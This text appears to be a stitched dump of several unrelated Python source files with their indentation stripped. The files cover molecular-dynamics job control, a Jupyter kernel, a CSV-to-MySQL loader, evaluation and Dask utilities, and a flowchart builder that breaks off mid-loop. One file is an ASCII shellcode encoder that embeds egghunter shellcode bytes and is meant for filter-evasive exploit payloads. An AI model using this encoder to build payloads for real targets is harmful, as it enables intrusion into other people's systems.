md_input = ProductionInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Production object is provided just add that
elif isinstance(md_input, ProductionInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
else:
raise Exception('md_input must be an instance of the ProductionInput class or None')
if not quiet:
logger.debug(f'Production flags: {md_input.arg_dict}')
def run(self,
arc = 3,
cores = 32
):
'''Writes the mdin files and runs the simulation using crossbow.
Parameters
----------
remoteworkdir : str
Full path to the directory on arc (should be on no backup) where
the simulations will be performed.
username : str
Arc username for logging in via ssh.
arc : int, optional
The Arc HPC cluster you want to perform the simulations on. Can be
3 or 4. The default is 3.
cores : int, default=32
The number of cores to use for minimisation (if minimisation is
used).
'''
# Longbow doesn't like absolute paths so get the basenames of the
# input files
parm7 = os.path.basename(self.parm7)
rst7 = os.path.basename(self.rst7)
ref_rst7 = os.path.basename(self.ref_rst7)
# Iterate through md steps and get step number (i)
for step_number, md_step in enumerate(self.md_steps):
# Create a key word argument dictionary for crossbow and add
# kwargs
kwargs = {}
kwargs['arc'] = arc
kwargs['localworkdir'] = self.simulation_directory
step_number += 1
step_name = md_step.__str__()
if step_name == 'production':
kwargs['stagingfrequency'] = 3600
attempt_number = 0
while True:
# File name will contain the step number (based on order in
# md_steps) and the name of the input object. The prefix here is
# used by longbow to automatically generate all of the output file
# names
fname = f'step-{step_number}.{attempt_number}-{step_name}.mdin'
if step_name == 'minimisation':
kwargs['minimisation'] = True
kwargs['cores'] = cores
else:
self.trajectories.append(os.path.join(self.simulation_directory, fname.replace('mdin', 'nc')))
# If step is not completed
if self.completed_steps[step_number-1] == 0:
md_step.write(self.simulation_directory, fname)
# Get the name for the job from the simulation name, step name, and
# step number
job_name = self.name + '.' + step_name[:3] + '.' + str(step_number) + '.' + str(attempt_number)
self.md_job_names.append(job_name)
# Get the positional arguments in a tuple. The positional arguments
# for crossbow are (name, user, mdin, parm7, rst7, ref_rst7)
args = (job_name, fname, parm7, rst7, ref_rst7)
if step_number != 1:
kwargs['hold_jid'] = self.md_job_names[step_number+attempt_number-2]
if self.completed_steps[step_number-1] == 0:
error_code = run_pmemd(*args, **kwargs)
if error_code == 0:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
self.completed_steps[step_number-1] = 1
break
elif error_code == 1:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
attempt_number += 1
self.completed_steps.append(0)
continue
elif error_code == 2:
self.run(arc, cores)
else:
rst7 = f'step-{step_number}.{attempt_number}-{step_name}.rst7'
break
else:
break
def remove_last_step(self):
# Set attributes
self.md_steps = self.md_steps[:-1]
self.md_inputs = self.md_inputs[:-1]
self.md_job_names = self.md_job_names[:-1]
self.trajectories = self.trajectories[:-1]
self.completed_steps = self.completed_steps[:-1]
def _restraints_from_arg(self, arg):
'''Converts restraints from argument to posres MDInput argument.
If the argument will not be a valid posres argument an execption is
raised.
Parameters
----------
arg
Restraint argument passed to method.
Returns
-------
restraints : tuple
MDInput object posres parameter.
'''
try:
residues, weight = arg
except:
raise Exception('Posres argument must be a length 2 tuple')
if residues == 'protein':
try:
residues = self.protein_termini
except:
return None
elif type(residues) is tuple:
if len(residues) != 2:
raise Exception(f'Protein restraint tuple must be length 2, not {len(residues)}')
else:
if type(residues) is list:
for residue in residues:
if len(residue) != 2:
raise Exception(f'Protein restraint tuple must be length 2, not {len(residue)}')
else:
raise Exception(f'Restraint argument can either be "protein" or tuple, not {type(residues)}')
return (residues, weight)
|
<gh_stars>0
##//%file:kernel.py
#
# MyHtml Jupyter Kernel
#
from math import exp
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
from pexpect import replwrap, EOF
from jinja2 import Environment, PackageLoader, select_autoescape,Template
from abc import ABCMeta, abstractmethod
from typing import List, Dict, Tuple, Sequence
from shutil import copyfile,move
from urllib.request import urlopen
import socket
import copy
import mmap
import contextlib
import atexit
import platform
import atexit
import base64
import urllib.request
import urllib.parse
import pexpect
import signal
import typing
import typing as t
import re
import signal
import subprocess
import tempfile
import os
import stat
import sys
import traceback
import os.path as path
import codecs
import time
import importlib
import importlib.util
import inspect
from . import ipynbfile
from plugins import ISpecialID
# from plugins.ISpecialID import IStag,IDtag,IBtag,ITag,ICodePreproc
from plugins._filter2_magics import Magics
from .Mymacroprocessor import Mymacroprocessor
try:
zerorpc=__import__("zerorpc")
# import zerorpc
except:
pass
fcntl = None
msvcrt = None
bLinux = True
if platform.system() != 'Windows':
fcntl = __import__("fcntl")
bLinux = True
else:
msvcrt = __import__('msvcrt')
bLinux = False
from .MyKernel import MyKernel
class MyHtmlKernel(MyKernel):
implementation = 'jupyter-MyHtml-kernel'
implementation_version = '1.0'
language = 'html'
language_version = ''
language_info = {'name': 'html',
'version': sys.version.split()[0],
'mimetype': 'text/html',
'codemirror_mode': {
'name': 'ipython',
'version': sys.version_info[0]
},
'pygments_lexer': 'ipython%d' % 3,
'nbconvert_exporter': 'python',
'file_extension': '.html'}
runfiletype='script'
banner = "MyHtml kernel.\n" \
"creates source code files and executables in temporary folder.\n"
kernelinfo="[MyHtml]"
main_head = "\n" \
"\n" \
"int main(List<String> arguments){\n"
main_foot = "\nreturn 0;\n}"
##//%include:src/comm_attribute.py
def __init__(self, *args, **kwargs):
super(MyHtmlKernel, self).__init__(*args, **kwargs)
self.runfiletype='script'
self.kernelinfo="[MyHtmlKernel{0}]".format(time.strftime("%H%M%S", time.localtime()))
#################
##do_runcode
def do_runcode(self,return_code,file_name,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=return_code
file_name=file_name
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
##代码运行前
for line in code.splitlines():
self.mymagics._write_to_stdout(line,magics)
##代码启动后
return_code=0
##代码运行结束
if return_code != 0:
self.mymagics._log("Executable exited with code {}".format(return_code),2)
return bcancel_exec,retinfo,magics, code,file_name,retstr
##do_compile_code
def do_compile_code(self,return_code,file_name,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=0
file_name=file_name
sourcefilename=file_name
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
return bcancel_exec,retinfo,magics, code,file_name,retstr
##do_create_codefile
def do_create_codefile(self,magics,code, silent, store_history=True,
user_expressions=None, allow_stdin=True):
return_code=0
file_name=''
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
retstr=''
source_file=self.mymagics.create_codetemp_file(magics,code,suffix='.html')
newsrcfilename=source_file.name
file_name=newsrcfilename
return_code=True
return bcancel_exec,self.mymagics.get_retinfo(),magics, code,file_name,retstr
##do_preexecute
def do_preexecute(self,code,magics,silent, store_history=True,
user_expressions=None, allow_stdin=False):
bcancel_exec=False
retinfo=self.mymagics.get_retinfo()
return bcancel_exec,retinfo,magics, code
|
import json
import mysql.connector
from mysql.connector import errorcode
import csv
from datetime import datetime
#get configuration settings from config.json
with open('config.json') as json_data_file:
data = json.load(json_data_file)
#print(data)
#print("host:"+data["mysql"]["host"])
host = data["mysql"]["host"]
user = data["mysql"]["user"]
passwd = data["mysql"]["passwd"]
db = data["mysql"]["db"]
table = data["table"]
filecsv = data["csv"]
try:
#establish connection
connection = mysql.connector.connect(host=host, user=user, password=passwd, database=db)
#create a cursor
mycursor = connection.cursor()
#build sql string******
sql = ""
strInsertFld = ""
strInsertPlaceHld = ""
listInsertVal = list()
listFieldFormat = list()
listFieldAsDate = list()
i = 0
for x in data["fields"]:
#going thru getting fields info from config (to see if there are any format consideration)
strField = x["name"]
#getting optional fields
strFormat = ""
strFieldAsDate = ""
##strFieldAsDate is used to store value from "fieldasdate" attribute coming from config.json
##"fieldasdate" indicates the field will be converted to a date field (instead of text) when inserted into MySql
##If the MySQL's field that's storing the csv's field is a date field, then need convert the csv to a date (otherwise if MySQL field is text/char don't need to do anything)...
##do this by identifying the date format that the csv field is using
##"fieldasdate" in config.json is the date format the csv field represents, see file "strptimeDateFormatCodes.txt" for proper Date Format codes for "fieldasdate"
##example 1, if the value of the "findate" field in "annual-bs.csv" is something like "12/31/2008"...
##and the user wants to import this into a MYSQL date field, then config.json needs to have:
##{"name":"findate", "fieldasdate":"%m/%d/%Y"}
if "format" in x:
strFormat = x["format"]
if "fieldasdate" in x:
strFieldAsDate = x["fieldasdate"]
listFieldFormat.append(strFormat)
listFieldAsDate.append(strFieldAsDate)
#print("field:" + strField + " format:" + strFormat)
if strInsertFld == "":
strInsertFld = strField
strInsertPlaceHld = "%s"
else:
strInsertFld += ", " + strField
strInsertPlaceHld += ", " + "%s"
#INSERT statement header & placeholder
strInsertFld = "(" + strInsertFld + ")"
strInsertPlaceHld = "(" + strInsertPlaceHld + ")"
#test
#strInsertPlaceHld = "(%s, %s, %s, %s, %s, %s, %s, %s)"
sql = "INSERT IGNORE INTO " + table + " " + strInsertFld + " VALUES " + strInsertPlaceHld + " "
#loop csv file and build list of values (listInsertVal) for all fields in each row
#placeholders (%s) used for parameters will ensure sql injection is taken care of
#although with this script, there's not alot of worries for injections b/c there are no user inputs to worry
with open(filecsv) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
#skip first line
line_count += 1
else:
#loop thru each field from each record, build values to insert into db
i = 0
end = len(row)
while i < end:
val = row[i]
#for handling custom format of the fields, add code here**
#if listFieldFormat[i] != "":
#for storing the field as a date field (MySql Date field will store any date as YYYY-MM-DD)
#here specify the date format the csv field is using (strptime 2nd parameter) if the MySQL field storing this value is a date field
#see file "strptimeDateFormatCodes.txt" for proper Date Format codes
if listFieldAsDate[i] != "":
val = datetime.strptime(val, listFieldAsDate[i])
#add to list of values (Python list) to be included in INSERT statement
listInsertVal.append(val)
i += 1
#execute the INSERT statement
mycursor.execute(sql, listInsertVal)
listInsertVal.clear() #clear items from list, to prepare for next iteration of values
line_count += 1
#ends csv loop
#commit inserts to DB
connection.commit()
print(str(line_count) + " records inserted.")
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
#quit script
exit()
else:
#run after try completed w/o errors
connection.close()
|
#!/usr/bin/env python3
################################################################################
# INTRODUCTION
################################################################################
# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH
# Date: 26.6.2019
# Encoder Author: <NAME>, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
#
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
#
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Than we can do it as follows:
#
# AND EAX, 3F465456
# AND EAX, 40392B29 ; Two AND instructions zero EAX
# SUB EAX, 3E716230 ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523 ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722 ; we get EAX = 0x8BD1EB05
# PUSH EAX
# Mandatory bytes:
# \x25 AND EAX, imm32
# \x2d SUB EAX, imm32
# \x50 PUSH EAX
# \x61 POPAD
# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder
# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.
################################################################################
import itertools
import struct
import random
import sys
assert sys.version_info >= (3, 6)
################################################################################
# CONSTANTS - no changes needed here
################################################################################
# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b)) # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b)) # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a)) # 0123456789
SPECIAL_CHARS = bytearray(
itertools.chain(
range(0x21, 0x30), # !"#$%&\'()*+,-.
range(0x3a, 0x41), # :;<=>?
range(0x5b, 0x61), # [\\]^_
range(0x7b, 0x7f) # {|}
)
)
ASCII_NOPS = b'\x41\x42\x43\x44' # and many more
ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
################################################################################
# SETTINGS - enter shellcode, select character set and bad chars
################################################################################
input_shellcode = (
b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
b'\x75\xe7\xff\xe7'
)
# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS
# badchars = b''
badchars = b''
nops = ASCII_NOPS
################################################################################
# CORE - no changes needed here
################################################################################
class ASCII_Encoder(object):
def __init__(self, shellcode_, charset_, badchars_, nops_):
# Constructor args
self.shellcode = bytearray(shellcode_)
self.charset = charset_
self.badchars = badchars_
self.nops = nops_
# Private vars
self.encoded_dwords = []
self.twos_comps = []
self.sub_operands = []
self.payload = bytearray()
def encode(self):
self.align_to_dwords()
self.remove_badchars()
self.derive_dwords_sub()
self.compensate_overflow()
self.derived_dwords_to_sub_operands()
self.twos_comp_check()
self.compile_payload()
def align_to_dwords(self):
# Input shellcode alignment to dword multiples
nop = b'\x90'
pad_count = 4 - (len(self.shellcode) % 4)
if 0 < pad_count < 4:
self.shellcode += nop * pad_count
def remove_badchars(self):
for badchar in self.badchars:
self.charset = self.charset.replace(bytes([badchar]), b'')
self.nops = self.nops.replace(bytes([badchar]), b'')
def derive_dwords_sub(self):
def get_sub_encoding_bytes(target):
"""
target x y z
0x100 - (0x21+0x21) = 0xbe
We need to select x, y, z such that it gives target when summed and all of
x, y, z is ASCII and non-badchar
"""
# Get all possible solutions
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
z = target - (x + y)
# Get only bytes which are ASCII and non-badchar
if (0 < z < 256) and (z in self.charset):
results.append({
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
})
# Choose random solution
return random.choice(results)
for dword in struct.iter_unpack('<L', self.shellcode):
# 32-bit 2's complement
twos_comp = (dword[0] ^ 0xffffffff) + 1
self.twos_comps.append(twos_comp)
encoded_block = []
for byte_ in struct.pack('>L', twos_comp):
# Will overflow be used when calculating this byte using 3 SUB instructions?
if byte_ / 3 < min(self.charset):
byte_ += 0x100
encoded_block.append(
get_sub_encoding_bytes(byte_))
pass
self.encoded_dwords.append(encoded_block)
def compensate_overflow(self):
# If neighbor lower byte overflow then subtract 1 from max(x, y, z)
for dword in self.encoded_dwords:
for solution, next_solution in zip(dword, dword[1:]):
if next_solution['of']:
max_value_key = max(solution, key=solution.get)
solution[max_value_key] -= 1
def derived_dwords_to_sub_operands(self):
for dword in self.encoded_dwords:
sub_operand_0 = struct.pack('<BBBB',
*[solution['x'] for solution in dword])
sub_operand_1 = struct.pack('<BBBB',
*[solution['y'] for solution in dword])
sub_operand_2 = struct.pack('<BBBB',
*[solution['z'] for solution in dword])
self.sub_operands.append([
sub_operand_0,
sub_operand_1,
sub_operand_2
])
def twos_comp_check(self):
# Check if calculated dwords for SUB instruction give 2's complement if they are summed
for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
sup_operand_sum = sum(
[int.from_bytes(dw, byteorder='big') for dw in sub_operand])
# Correction of sum if there is overflow on the highest byte
if sup_operand_sum > 0xffffffff:
sup_operand_sum -= 0x100000000
assert (twos_comp == sup_operand_sum)
def compile_payload(self):
def derive_bytes_and():
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
if x + y == 127:
results.append((x, y))
while 1:
yield random.choice(results)
def derive_dwords_and():
gen_bytes = derive_bytes_and()
bytes_ = []
for _ in range(0, 4):
bytes_.append(next(gen_bytes))
return bytes_
# POPAD n times to adjust ESP.
# Decoded shellcode must be written after the decoder stub
self.payload += b'\x61' * (len(self.encoded_dwords))
for sub_operand in reversed(self.sub_operands):
# Clearing EAX instructions with AND instructions
bytes_ = derive_dwords_and()
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[0] for byte_ in bytes_])
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[1] for byte_ in bytes_])
# Encoded shellcode with SUB instructions
self.payload += b'\x2d' + sub_operand[0][::-1]
self.payload += b'\x2d' + sub_operand[1][::-1]
self.payload += b'\x2d' + sub_operand[2][::-1]
# Push EAX
self.payload += b'\x50'
# Pad with NOPs
self.payload += bytes(random.choices(self.nops, k=9))
def print_payload(self):
print('Original payload length: {}'.format(len(input_shellcode)))
print('Encoded payload length: {}'.format(len(self.payload)))
print('hex: ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
if __name__ == '__main__':
encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
encoder.encode()
encoder.print_payload()
|
<filename>check_fictionalgeoqa_answers.py
import json
import sys
import re
def test_candidate(candidate, actual_answers):
candidates = [candidate]
if not candidate.startswith('river') and not candidate.endswith('river'):
candidates.append(candidate + ' river')
candidates.append('river ' + candidate)
for c in candidates:
try:
actual_answers.remove(c)
return True
except ValueError:
pass
return False
if len(sys.argv) < 2:
print("check_fictionalgeoqa_answers [answers file]")
sys.exit(1)
try:
actual_file = open('fictionalgeoqa.jsonl')
predicted_file = open(sys.argv[1])
except IOError as e:
print(e)
sys.exit(1)
total = 0
correct = 0
correct_per_flag = {}
total_per_flag = {}
correct_per_flag_count = {}
total_per_flag_count = {}
while True:
actual_line = actual_file.readline()
predicted_line = predicted_file.readline()
if len(actual_line) == 0:
if len(predicted_line) != 0:
print("WARNING: There are more predictions than questions.")
break
predicted_answer = predicted_line
while True:
old_predicted_answer = predicted_answer
predicted_answer = predicted_line.strip()
if len(predicted_answer) > 0 and predicted_answer[0] == '<':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == '>':
predicted_answer = predicted_answer[:-1]
if len(predicted_answer) > 0 and predicted_answer[0] == '(':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == ')':
predicted_answer = predicted_answer[:-1]
if len(predicted_answer) > 0 and predicted_answer[0] == '[':
predicted_answer = predicted_answer[1:]
if len(predicted_answer) > 0 and predicted_answer[-1] == ']':
predicted_answer = predicted_answer[:-1]
if predicted_answer == old_predicted_answer:
break
predicted_answer = predicted_answer.lower()
if predicted_answer == 'no answer' or predicted_answer == 'none' or predicted_answer == 'nothing' or predicted_answer == 'empty':
predicted_answer = ''
try:
example = json.loads(actual_line)
except:
print('Failed to parse JSON on line ' + str(total + 1))
raise
for question in example["questions"].values():
actual_answer = question["answer"]
if actual_answer == "":
actual_answers = []
else:
actual_answers = [x.lower().strip() for x in actual_answer.split(",")]
start = 0
next_index = 0
while next_index < len(predicted_answer):
index = predicted_answer.find(',', next_index)
if index != -1:
next_index = index + 1
else:
index = predicted_answer.find('.', next_index)
if index != -1:
next_index = index + 1
else:
index = predicted_answer.find('and', next_index)
if index != -1:
next_index = index + 3
else:
index = len(predicted_answer)
next_index = index
# check if predicted_answer[start:index] is a correct answer
candidate = predicted_answer[start:index].strip()
if test_candidate(candidate, actual_answers):
start = next_index
continue
if candidate.startswith('the ') and test_candidate(candidate[4:], actual_answers):
start = next_index
continue
elif candidate.startswith('a ') and test_candidate(candidate[2:], actual_answers):
start = next_index
continue
if "answer_templates" in question:
answer_templates = question["answer_templates"]
found_matching_template = False
for answer_template in answer_templates:
ans_index = answer_template.find('{0}')
start_re = '^' + answer_template[:ans_index].lower()
end_re = answer_template[(ans_index + 3):].lower() + '\.?$'
if candidate.endswith('..'):
# specifically exclude answers that end in two periods (that may slip through since the answer template may already allow a period at the end)
continue
start_re_match = re.match(start_re, candidate)
end_re_match = re.search(end_re, candidate)
if start_re_match != None and end_re_match != None and test_candidate(candidate[start_re_match.span()[1]:end_re_match.span()[0]].lower(), actual_answers):
found_matching_template = True
break
if found_matching_template:
start = next_index
continue
if len(actual_answers) != 0:
# not all correct answers were predicted
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' INCORRECT")
elif start != len(predicted_answer):
# there are more predicted answers than actual answers
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' INCORRECT")
else:
print("[" + str(total + 1) + "] Predicted: '" + predicted_line.strip() + "', Actual: '" + actual_answer + "' CORRECT")
is_correct = (len(actual_answers) == 0 and start == len(predicted_answer))
if is_correct:
correct += 1
total += 1
flag_count = 0
if "data_subsets" in example:
flag_count = len(example["data_subsets"])
for flag in example["data_subsets"]:
if flag not in correct_per_flag:
correct_per_flag[flag] = 0
total_per_flag[flag] = 0
if is_correct:
correct_per_flag[flag] += 1
total_per_flag[flag] += 1
if flag_count not in correct_per_flag_count:
correct_per_flag_count[flag_count] = 0
total_per_flag_count[flag_count] = 0
if is_correct:
correct_per_flag_count[flag_count] += 1
total_per_flag_count[flag_count] += 1
print("Accuracy: " + str(correct) + "/" + str(total) + " = " + str(float(correct)/total))
for (flag, total_flag) in total_per_flag.items():
correct_flag = correct_per_flag[flag]
print("[" + flag + "] " + str(correct_flag) + "/" + str(total_flag) + " = " + str(float(correct_flag)/total_flag))
print("[all except " + flag + "] " + str(correct - correct_flag) + "/" + str(total - total_flag) + " = " + str(float(correct - correct_flag)/(total - total_flag)))
for (flag_count, total_flag) in sorted(total_per_flag_count.items()):
correct_flag = correct_per_flag_count[flag_count]
print("[" + str(flag_count) + " data_subsets] " + str(correct_flag) + "/" + str(total_flag) + " = " + str(float(correct_flag)/(total_flag)))
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class InternalFlowException(Exception):
pass
class ReturnException(InternalFlowException):
def __init__(self, value):
self._value = value
@property
def value(self):
return self._value
class BreakException(InternalFlowException):
pass
class ContinueException(InternalFlowException):
pass
class DslInvalidOperationError(Exception):
pass
class NoMethodFound(Exception):
def __init__(self, name):
super(NoMethodFound, self).__init__('Method "%s" is not found' % name)
class NoPropertyFound(Exception):
def __init__(self, name):
super(NoPropertyFound, self).__init__(
'Property "%s" is not found' % name)
class NoClassFound(Exception):
def __init__(self, name, packages=None):
if packages is None:
packages = []
packages = ', '.join("{0}/{1}".format(p.name, p.version)
for p in packages)
super(NoClassFound, self).__init__(
'Class "{0}" is not found in {1}'.format(name, packages))
class NoPackageFound(Exception):
def __init__(self, name):
super(NoPackageFound, self).__init__(
'Package "%s" is not found' % name)
class NoPackageForClassFound(Exception):
def __init__(self, name):
super(NoPackageForClassFound, self).__init__('Package for class "%s" '
'is not found' % name)
class NoObjectFoundError(Exception):
def __init__(self, object_id):
super(NoObjectFoundError, self).__init__(
'Object "%s" is not found in object store' % object_id)
class AmbiguousMethodName(Exception):
def __init__(self, name):
super(AmbiguousMethodName, self).__init__(
'Found more that one method "%s"' % name)
class AmbiguousClassName(Exception):
def __init__(self, name):
super(AmbiguousClassName, self).__init__(
'Found more that one version of class "%s"' % name)
class DslContractSyntaxError(Exception):
pass
class ContractViolationException(Exception):
def __init__(self, *args, **kwargs):
super(ContractViolationException, self).__init__(*args, **kwargs)
self._path = ''
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
class ValueIsMissingError(Exception):
pass
class DslSyntaxError(Exception):
pass
class PropertyAccessError(Exception):
pass
class AmbiguousPropertyNameError(PropertyAccessError):
def __init__(self, name):
super(AmbiguousPropertyNameError, self).__init__(
'Found more that one property "%s"' % name)
class NoWriteAccess(PropertyAccessError):
def __init__(self, name):
super(NoWriteAccess, self).__init__(
'Property "%s" is immutable to the caller' % name)
class NoWriteAccessError(PropertyAccessError):
def __init__(self, name):
super(NoWriteAccessError, self).__init__(
'Property "%s" is immutable to the caller' % name)
class PropertyReadError(PropertyAccessError):
def __init__(self, name, murano_class):
super(PropertyAccessError, self).__init__(
'Property "%s" in class "%s" cannot be read' %
(name, murano_class.name))
class PropertyWriteError(PropertyAccessError):
def __init__(self, name, murano_class):
super(PropertyAccessError, self).__init__(
'Property "%s" in class "%s" cannot be written' %
(name, murano_class.name))
class UninitializedPropertyAccessError(PropertyAccessError):
def __init__(self, name, murano_class):
super(PropertyAccessError, self).__init__(
'Access to uninitialized property '
'"%s" in class "%s" is forbidden' % (name, murano_class.name))
class CircularExpressionDependenciesError(Exception):
pass
class InvalidLhsTargetError(Exception):
def __init__(self, target):
super(InvalidLhsTargetError, self).__init__(
'Invalid assignment target "%s"' % target)
class InvalidInheritanceError(Exception):
pass
|
from typing import Any, Callable, List, Optional
import dask.dataframe as dd
import numpy as np
import pandas as pd
import pyarrow as pa
from slide.exceptions import SlideInvalidOperation
from slide.utils import SlideUtils
from triad.utils.assertion import assert_or_throw
from triad.utils.pyarrow import to_pandas_dtype
class DaskUtils(SlideUtils[dd.DataFrame, dd.Series]):
"""A collection of Dask utils"""
def is_series(self, obj: Any) -> bool:
return isinstance(obj, dd.Series)
def to_series(self, obj: Any, name: Optional[str] = None) -> dd.Series:
if self.is_series(obj):
if name is not None and obj.name != name:
return obj.rename(name)
return obj
if isinstance(obj, (np.ndarray, list)):
return dd.from_array(np.array(obj), columns=name)
if isinstance(obj, pd.Series):
res = dd.from_pandas(obj, chunksize=50000)
if name is not None and res.name != name:
return res.rename(name)
return res
raise NotImplementedError # pragma: no cover
def series_to_array(self, col: dd.Series) -> List[Any]:
return col.compute().tolist()
def to_constant_series(
self,
constant: Any,
from_series: dd.Series,
dtype: Any = None,
name: Optional[str] = None,
) -> dd.Series:
if dtype is not None:
return from_series.map(lambda _: constant, meta=(name, dtype))
tdf = from_series.to_frame()
tn = name or "_tmp_"
tdf[tn] = constant
return tdf[tn]
def cols_to_df(
self, cols: List[Any], names: Optional[List[str]] = None
) -> dd.DataFrame:
assert_or_throw(
any(self.is_series(s) for s in cols),
SlideInvalidOperation("at least one value in cols should be series"),
)
if names is None:
col_names: List[str] = [c.name for c in cols]
else:
col_names = names
for i in range(len(cols)):
if self.is_series(cols[i]):
break
tdf = cols[i].to_frame(col_names[i])
for j in range(len(cols)):
if i != j:
tdf[col_names[j]] = cols[j]
return tdf[col_names]
def is_compatile_index(self, df: dd.DataFrame) -> bool:
"""Check whether the datafame is compatible with the operations inside
this utils collection
:param df: dask dataframe
:return: if it is compatible
"""
return (
isinstance(
df.index,
(pd.RangeIndex, pd.Int64Index, pd.UInt64Index, dd.Index),
)
or self.empty(df)
)
def sql_groupby_apply(
self,
df: dd.DataFrame,
cols: List[str],
func: Callable[[dd.DataFrame], dd.DataFrame],
output_schema: Optional[pa.Schema] = None,
**kwargs: Any,
) -> dd.DataFrame:
assert_or_throw(
output_schema is not None, ValueError("for Dask, output_schema is required")
)
meta = to_pandas_dtype(output_schema, use_extension_types=True)
self.ensure_compatible(df)
if len(cols) == 0:
return df.map_partitions(func, meta=meta).reset_index(drop=True)
return (
df.groupby(cols, dropna=False, group_keys=False)
.apply(lambda tdf: func(tdf.reset_index(drop=True)), meta=meta, **kwargs)
.reset_index(drop=True)
)
def as_pandas(self, df: dd.DataFrame) -> pd.DataFrame:
return df.compute()
def filter_df(self, df: dd.DataFrame, cond: Any) -> dd.DataFrame:
c = self._safe_bool(cond)
if self.is_series(c):
return df[c]
elif c:
return df
else:
return dd.from_pandas(df.head(0), npartitions=2)
def _cast_to_datetime(
self,
col: dd.Series,
from_type: pa.DataType,
inf_type: pa.DataType,
safe_dtype: np.dtype,
) -> dd.Series:
return dd.to_datetime(col)
def _cast_to_float(
self,
col: dd.Series,
from_type: pa.DataType,
inf_type: pa.DataType,
safe_dtype: np.dtype,
) -> dd.Series:
if pd.__version__ < "1.2": # pragma: no cover
if pa.types.is_string(inf_type):
return col.fillna("nan").astype(safe_dtype)
return super()._cast_to_float(
col=col, from_type=from_type, inf_type=inf_type, safe_dtype=safe_dtype
)
|
from node import *
from regexes import *
from sys import argv
import pickle
if len(argv) < 3:
print("Usage: python3 %s [input code file] [output flowchart file]" % argv[0])
raise SystemExit()
"""
start = StartNode()
a_in = InputNode("A")
b_in = InputNode("B")
a_lt_b = ConditionalNode("A < B")
a_dec_b = Node("A = A - B")
a_out = OutputNode("A")
stop = StopNode()
start.connect(a_in)
a_in.connect(b_in)
b_in.connect(a_lt_b)
a_lt_b.if_yes(a_out)
a_lt_b.if_no(a_dec_b)
a_dec_b.connect(a_lt_b)
a_out.connect(stop)
walkthrough(start)
"""
lines = list(filter(lambda c: len(c), map(lambda line: line.rstrip().replace(" ", "~"), open(argv[1]))))
def get_handle(code):
nodes = list()
while len(code):
line = code[0]
print(line)
if line[-1] == ":":
blank = ConnectorNode()
print("block node")
if loop.match(line):
print("loop node")
loop_br = ConditionalNode(loop.match(line).groups()[0])
body = list()
while (len(code)-1) and code[1][0] == "~":
body.append(code[1][1:])
del code[1]
print("body: %s" % str(body))
body_flow = get_handle(body)
print("body flow: %s" % str(body_flow))
loop_br.if_yes(body_flow[0])
body_flow[-1].connect(loop_br)
loop_br.if_no(blank)
if len(nodes):
nodes[-1].connect(loop_br)
else:
nodes.append(loop_br)
elif branch.match(line):
print("conditional node")
con_br = ConditionalNode(branch.match(line).groups()[0])
body = list()
while (len(code)-1) and code[1][0] == "~":
body.append(code[1][1:])
del code[1]
